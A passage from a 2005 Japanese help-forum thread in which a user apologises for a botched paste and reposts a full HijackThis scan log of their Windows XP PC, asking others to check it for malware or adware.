O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\Tmntsrv.exe
O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\TmPfw.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\tmproxy.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

88 :66:2005/07/30(土) 22:53:16 ID:vQUTlBEV
これで終わりです。
長くてごめんなさい。
よろしくお願いします。

89 :ひよこ名無しさん:2005/07/30(土) 22:59:41 ID:???
>>88
おまえ2回連続でスキャンしただろ、もう一回やり直しだ。

90 :66:2005/07/30(土) 23:01:46 ID:vQUTlBEV
一回だったと思うのですが…。
分かりました。もう一度やり直します。

91 :ひよこ名無しさん:2005/07/30(土) 23:02:44 ID:???
>>90
そうなの?同じだったら貼らなくていいよ。

92 :66:2005/07/30(土) 23:04:00 ID:vQUTlBEV
もう一度ソフトのダウンロードからやりなおしてみたので
今から見直します。

93 :66:2005/07/30(土) 23:12:31 ID:vQUTlBEV
すいません、違っているようです…。
スレ消費させてごめんなさい。
貼りなおします。

94 :66:2005/07/30(土) 23:14:28 ID:vQUTlBEV
Logfile of HijackThis v1.99.1
Scan saved at 23:01:50, on 2005/07/30
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\acs.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Justsystem\OpenMG BeatJam\Plugin\bgsvclib.exe
C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nmftskss.exe
C:\WINDOWS\system32\NTMETER.EXE
C:\PROGRA~1\TRENDM~1\VIRUSB~1\PcCtlCom.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\TRENDM~1\VIRUSB~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\VIRUSB~1\tmproxy.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\Windows\System32\asrv.exe
C:\WINDOWS\system32\FUSCli.exe
C:\PROGRA~1\TRENDM~1\VIRUSB~1\TmPfw.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe

95 :66:2005/07/30(土) 23:15:15 ID:vQUTlBEV
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Program Files\Analog Devices\SoundMAX\Smax4.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\NEC\SmartVision\SVUPnPMn.exe
C:\Program Files\NEC\SmartVision\SvSche.exe
C:\Program Files\DigiOn\DiXiM Media Server\dms_helper.exe
C:\Program Files\MediaGarage\MGSplash.exe
C:\Program Files\MediaGarage\MGAutoPlay.exe
C:\Program Files\Java\jre1.5.0\bin\jusched.exe
C:\Program Files\FaUserSW\NMUWATCH.EXE
C:\Program Files\Java\jre1.5.0\bin\jucheck.exe
C:\Program Files\SmartHobby\AutoDnP.exe
C:\Program Files\nectvrc\tvrc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\NECMFK\necmfk.exe
C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe
C:\Program Files\Common Files\Logitech\QCDriver3\LVCOMS.EXE
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\Program Files\Softnavi\SNaviBTN.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\tora3\2chtubo\tubo\_2chtubo.exe
C:\Program Files\unDonut\unDonut.exe
C:\Documents and Settings\YUKI-1\デスクトップ\HijackThis\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O3 - Toolbar: BIGLOBEツールバー - {DD7EDCBC-F49A-4008-AA47-74D852489985} - C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL
O3 - Toolbar: &Liquid Surf - {B9F633F6-EA44-45F4-91EB-FABFC65A0634} - C:\Program Files\LiquidSurf\sybil.dll
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)

96 :66:2005/07/30(土) 23:16:20 ID:vQUTlBEV
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [SHRunOnce] C:\Program Files\SmartHobby\SHRunOnce.exe
O4 - HKLM\..\Run: [SVUPnPManager] C:\Program Files\NEC\SmartVision\SVUPnPMn.exe
O4 - HKLM\..\Run: [SmartVisionScheduler] C:\Program Files\NEC\SmartVision\SvSche.exe
O4 - HKLM\..\Run: [dms_helper] "C:\Program Files\DigiOn\DiXiM Media Server\dms_helper.exe"
O4 - HKLM\..\Run: [MGSplash] C:\Program Files\MediaGarage\MGSplash.exe
O4 - HKLM\..\Run: [MGAutoPlay] C:\Program Files\MediaGarage\MGAutoPlay.exe
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\WINDOWS\Downlo~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0\bin\jusched.exe
O4 - HKLM\..\Run: [FaUserSW] C:\Program Files\FaUserSW\NMUWATCH.EXE
O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET
O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32
O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC

97 :66:2005/07/30(土) 23:17:09 ID:vQUTlBEV
O4 - HKLM\..\Run: [NECTVRC] C:\Program Files\nectvrc\tvrc.exe
O4 - HKLM\..\Run: [NECMFK] C:\Program Files\NECMFK\necmfk.exe
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe"
O4 - HKLM\..\Run: [LVCOMS] C:\Program Files\Common Files\Logitech\QCDriver3\LVCOMS.EXE
O4 - HKLM\..\Run: [LogitechGalleryRepair] C:\Program Files\Logitech\ImageStudio\ISStart.exe
O4 - HKLM\..\Run: [LogitechImageStudioTray] C:\Program Files\Logitech\ImageStudio\LogiTray.exe
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [121ポップリンク] "C:\Program Files\GTAgent\AUAgent.exe" /startup
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: ニュース検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_news.htm
O8 - Extra context menu item: ページ検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_web.htm

98 :66:2005/07/30(土) 23:17:43 ID:vQUTlBEV
O8 - Extra context menu item: 画像をマイ ピクチャへ上書き保存 - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/SCRIPT_URL.htm
O8 - Extra context menu item: 画像検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_pict.htm
O8 - Extra context menu item: 辞書検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_dic.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe
O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [!CNS] JWord (日本語キーワード)
O14 - IERESET.INF: START_PAGE_URL=http://www.biglobe.ne.jp/index-pc.html
O16 - DPF: {1D7EBFD0-78EF-4A9F-BB1C-AF4762E95E8E} (VGGLoadSi Control) - http://www.gogosi.jp/VGGLoadSi.cab

99 :66:2005/07/30(土) 23:18:34 ID:vQUTlBEV
O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - http://www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab
O16 - DPF: {2A7EFEAA-8059-4C69-8FE2-4BA999C3B102} (TrickCtrl Class) - https://ssl2.gcrest.com/trickster/cabs/TrickLauncher.cab
O16 - DPF: {7623BE59-D4CF-4379-ABC4-B39E11854D66} (MabinogiWebAvatarRenderer Class) - http://avatar.mabinogi.jp/3drender/renderer/mabiweb_JP.2005.2.2.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O18 - Protocol: bw+0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw+0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw-0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw-0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw00 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw00s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

100 :66:2005/07/30(土) 23:19:11 ID:vQUTlBEV
O18 - Protocol: bw10 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw10s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw20 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw20s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw30 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw30s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw40 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw40s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw50 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw50s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

101 :66:2005/07/30(土) 23:19:45 ID:vQUTlBEV
O18 - Protocol: bw60 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw60s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw70 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw70s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw80 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw80s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw90 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw90s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwa0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwa0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

102 :66:2005/07/30(土) 23:20:31 ID:vQUTlBEV
O18 - Protocol: bwb0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwb0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwc0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwc0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwd0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwd0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwe0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwe0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwf0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwf0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

103 :66:2005/07/30(土) 23:21:08 ID:vQUTlBEV
O18 - Protocol: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll
O18 - Protocol: bwg0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwg0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwh0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwh0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwi0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwi0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwj0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwj0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwk0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

104 :66:2005/07/30(土) 23:21:47 ID:vQUTlBEV
O18 - Protocol: bwk0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwl0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwl0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwm0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwm0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwn0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwn0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwo0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwo0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwp0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

105 :66:2005/07/30(土) 23:22:25 ID:vQUTlBEV
O18 - Protocol: bwp0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwq0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwq0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwr0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwr0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bws0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bws0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwt0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwt0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwu0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

106 :66:2005/07/30(土) 23:23:08 ID:vQUTlBEV
O18 - Protocol: bwu0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwv0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwv0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bww0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bww0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwx0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwx0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwy0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwy0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bwz0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll

107 :66:2005/07/30(土) 23:23:47 ID:vQUTlBEV
O18 - Protocol: bwz0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: msjwwdat - {BAAB02DC-913E-40AA-B9ED-8068DEE42CFA} - C:\Program Files\Microsoft Office\Home Style\JWW\JWWData.dll
O18 - Protocol: offline-8876480 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: Unimodem - C:\WINDOWS\system32\mwc42loc.dll
O23 - Service: Atheros Configuration Service (ACS) - Unknown owner - C:\WINDOWS\system32\acs.exe
O23 - Service: Apache - Unknown owner - C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice (file missing)
O23 - Service: Family Channel Switch (Asrv) - Unknown owner - c:\Windows\System32\asrv.exe
O23 - Service: B's Recorder GOLD Library Service (bgsvclib) - B.H.A Corporation - C:\Program Files\Justsystem\OpenMG BeatJam\Plugin\bgsvclib.exe
O23 - Service: DiXiM Media Server - DigiOn - C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe
O23 - Service: MSCSPTISRV - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe

108 :66:2005/07/30(土) 23:24:25 ID:vQUTlBEV
O23 - Service: Register Task Helper (Nmftskss) - NEC Corporation - C:\WINDOWS\system32\nmftskss.exe
O23 - Service: NT Meter - Unknown owner - C:\WINDOWS\system32\NTMETER.EXE
O23 - Service: PACSPTISVR - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\PcCtlCom.exe
O23 - Service: BroadPass Manager (Poling_Service) - 日本電気株式会社 - c:\Program Files\BIGLOBE\BroadPass\base\base.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\Tmntsrv.exe
O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\TmPfw.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\tmproxy.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

109 :66:2005/07/30(土) 23:25:15 ID:vQUTlBEV
今度こそ終わりです。
スレを無駄に消費してしまってごめんなさい。
お願いします。

